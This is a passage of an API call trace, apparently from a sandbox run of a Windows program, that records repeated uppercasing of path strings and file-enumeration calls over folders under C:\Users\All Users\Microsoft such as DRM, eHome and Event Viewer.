(in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DeviceSync\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICESYNC\\") returned 0x28 [0108.609] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\DeviceSync\\*.*", lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0x1c7f68 [0108.609] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0108.609] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0108.609] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0108.609] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.609] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\", cchLength=0x21 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\") returned 0x21 [0108.610] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\DRM\\*.*", lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0x1c7f68 [0108.610] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0108.610] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DRM\\SERVER\\") returned 0x28 [0108.610] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\*.*", lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0x1c7fa8 [0108.611] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0108.611] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0108.611] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0108.611] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0108.611] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0108.611] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\", cchLength=0x23 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\") returned 0x23 [0108.611] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\eHome\\*.*", lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0x1c7f68 [0108.662] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0108.662] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\", cchLength=0x28 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EHOME\\LOGS\\") returned 0x28 [0108.662] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\eHome\\logs\\*.*", lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0x1c7fa8 [0108.663] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0108.663] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0108.663] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0108.663] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0108.663] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0108.663] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\", cchLength=0x2a | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\") returned 0x2a [0108.663] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Event Viewer\\*.*", lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0x1c7f68 [0108.705] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0108.705] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0108.705] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\", cchLength=0x30 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\VIEWS\\") returned 0x30 [0108.705] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\", cchLength=0x30 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\VIEWS\\") returned 0x30 [0108.705] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\", cchLength=0x30 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\VIEWS\\") returned 0x30 [0108.705] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\", cchLength=0x30 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\VIEWS\\") returned 0x30 [0108.706] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\", cchLength=0x30 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\VIEWS\\") returned 0x30 [0108.706] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\", cchLength=0x30 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\VIEWS\\") returned 0x30 [0108.706] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\", cchLength=0x30 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\VIEWS\\") returned 0x30 [0108.706] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\", cchLength=0x30 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\EVENT VIEWER\\VIEWS\\") returned 0x30 [0108.706] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\", cchLength=0x30 | out: lpsz="C:\\USERS\\ALL 